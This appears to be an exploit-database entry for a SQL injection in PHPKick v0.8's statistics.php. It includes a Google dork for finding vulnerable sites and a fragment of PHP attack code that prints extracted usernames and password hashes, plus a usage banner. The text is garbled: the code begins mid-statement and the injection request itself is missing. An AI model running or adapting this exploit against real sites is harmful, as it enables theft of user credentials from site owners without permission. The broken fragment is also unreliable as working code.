# Exploit Title: PHPKick v0.8 statistics.php SQL Injection # Date: August 8th, 2010 # Time: 03:45am ;( # Author: garwga # Version: 0.8 # Google dork : "© 2004 PHPKick.de Version 0.8" # Category: webapps/0day # Code: see below ",":"); echo "username: $username\n"; $hash=GetBetween($source,"
$username:",""); echo"hash: $hash\n"; } else{ echo"\n\n"; echo"|=================PHPKick v0.8 statistics.php SQL Injection==================|\n"; echo"| |\n"; echo"|Syntax: php ".$_SERVER['argv'][0]." [host] [path] |\n"; echo"| |\n"; echo"|Example: php ".$_SERVER['argv'][0]." http://www.domain.com /path/ |\n"; echo"| |\n"; echo"|Notes:This exploit works regardless of the PHP security settings |\n"; echo"| (magic_quotes, register_globals).This exploit is only for educational |\n"; echo"| use, use it on your own risk! Exploiting scripts without permission of|\n"; echo"| the owner of the webspace is illegal! |\n"; echo"| I'm not responsible for any resulting damage |\n"; echo"| |\n"; echo"|Google Dork: \"© 2004 PHPKick.de Version 0.8\" |\n"; echo"| |\n"; echo"|Exploit found by garwga (ICQ#:453-144-667) |\n"; echo"|============================================================================|\n"; } function GetBetween($content,$start,$end){ $r = explode($start, $content); if (isset($r[1])){ $r = explode($end, $r[1]); return $r[0]; } return ''; } ?>